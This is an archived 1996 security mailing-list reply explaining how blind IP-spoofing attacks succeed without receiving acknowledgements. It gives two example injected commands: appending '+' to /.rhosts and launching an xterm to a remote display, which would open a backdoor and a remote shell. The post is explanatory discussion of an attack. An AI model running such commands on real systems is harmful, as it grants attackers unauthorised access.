[1928] in WWW Security List Archive

home help back first fref pref prev next nref lref last post

Re: Restrictions group without ask for the password

daemon@ATHENA.MIT.EDU (Chris Garrigues)
Sun Apr 28 21:40:11 1996

To: Eric Wieling <ewieling@hephaestus.icorp.net>
Cc: adam@lighthouse.homeport.org (Adam Shostack), dmurray@pdssoftware.com,
        www-security@ns2.rutgers.edu, cwg@deepeddy.DeepEddy.Com
In-Reply-To: Your message of "Sat, 27 Apr 1996 11:37:48 CDT."
             <199604271637.LAA01081@hephaestus.icorp.net> 
Date: Sun, 28 Apr 1996 18:12:00 -0500
From: Chris Garrigues <cwg@DeepEddy.Com>
Errors-To: owner-www-security@ns2.rutgers.edu

-----BEGIN PGP SIGNED MESSAGE-----

Content-Type: text/plain; charset=us-ascii

> I'm not an expert in the matter, but I wonder how ACK packets and
> return data gets back to the machine doing the IP spoofing?  

They don't.  The spoofing machine assumes that the packets are ACK'd and it 
sends messages which open up other holes through which it can actually send 
the data back again.  For instance, it might send the equivalent of "echo + >> 
/.rhosts" or "xterm -display wherever.edu:0".  The acknowlegement of the 
former would be the newly found ability to rsh to the machine.  The 
confirmation of the latter would be the window appearing on the local screen.

Chris


- -- 
Chris Garrigues                    O-              cwg@DeepEddy.Com
  Deep Eddy Internet Consulting                     +1 512 432 4046
  609 Deep Eddy Avenue
  Austin, TX  78703-4513              http://www.DeepEddy.Com/~cwg/



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMYP7O5aQnaaFII2dAQE5UAL+JvabaTQFJ1mBdQCD1PCQoRkz/xp4ltHk
ROudZRLQlQXLKU8sOytI2/awgiNsFiWkLuXbnqt+5kVuZV1ZytlqV1e8ztVBpMTj
aK+7hTQiT79HQLGIZHsQW2Jc3hpSv8re
=OYop
-----END PGP SIGNATURE-----

home help back first fref pref prev next nref lref last post